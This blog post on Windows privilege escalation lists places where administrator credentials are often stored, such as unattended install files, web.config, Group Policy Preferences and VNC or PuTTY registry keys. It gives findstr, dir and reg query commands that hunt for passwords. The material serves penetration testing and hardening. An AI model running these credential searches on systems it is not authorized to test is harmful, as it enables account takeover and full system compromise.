When an attacker has managed to gain access on a system one of his first moves is to search the entire system in order to discover credentials for the local administrator account which it will allow him to fully compromise the box. This is of course the easiest method of escalating privileges in a Windows system and the purpose of this article is to examine some common places of where these credentials might exist in order to assist with this process.

Windows Files

It is very common for administrators to use Windows Deployment Services in order to create an image of a Windows operating system and deploy this image in various systems through the network. This is called unattended installation. The problem with unattended installations is that the local administrator password is stored in various locations either in plaintext or as Base-64 encoded. These locations are:


There is a Metasploit module which can discover credentials via unattended installations:


If the system is running an IIS web server the web.config file should be checked as it might contain the administrator password in plaintext. The location of this file is usually in the following directories:


A sample of a web.config file with the administrator credentials can be seen below:

<?xml version="1.0" encoding="UTF-8"?>
<authentication mode="Windows">
<credentials passwordFormat="Clear">
<user name="Admin" password="Admin" />

Local administrators passwords can also retrieved via the Group Policy Preferences. The Groups.xml file which contains the password is cached locally or it can be obtained from the domain controller as every domain user has read access to this file. The password is in an encrypted form but Microsoft has published the key and it can be decrypted.

C:\ProgramData\Microsoft\Group Policy\History\????\Machine\Preferences\Groups\Groups.xml

Except of the Group.xml file the cpassword attribute can be found in other policy preference files as well such as:



Instead of manually browsing all the files in the system it is also possible to run the following command in order to discover files that contain the word password:

findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini

Alternatively the following commands from the C: drive will return the location of the files that elevated credentials might be stored:

C:\> dir /b /s unattend.xml
C:\> dir /b /s web.config
C:\> dir /b /s sysprep.inf
C:\> dir /b /s sysprep.xml
C:\> dir /b /s *pass*
C:\> dir /b /s vnc.ini

Third Party Software


Most Windows systems they are running McAfee as their endpoint protection. The password is stored encrypted in the SiteList.xml file:

%AllUsersProfile%Application Data\McAfee\Common Framework\SiteList.xml


Administrators some times tend to use VNC software instead of Windows Terminal Services for remote administration of the system. The password is encrypted but there are various tools that can decrypt it.




In RealVNC the hashed password is located in the following registry key:

reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password


Putty clear text proxy credentials can be found in the following directory:

reg query" HKCU\Software\SimonTatham\PuTTY\Sessions"


Registry can be queried as in some occasions might contain credentials.

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Windows Autologin:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
SNMP Parameters:
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"


PowerSploit can be used as a tool for the discovery of stored credentials. Specifically it supports the following modules which will check for credentials encrypted or plain-text in various files and in the registry:



    1. Thanks! I was aware of this tool, however this is a considered as a password recovery tool for third party software mainly. The purpose of this article was to examine locations of where local administrator passwords are stored in order to perform privilege escalation. However I can see the value of this tool as well.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s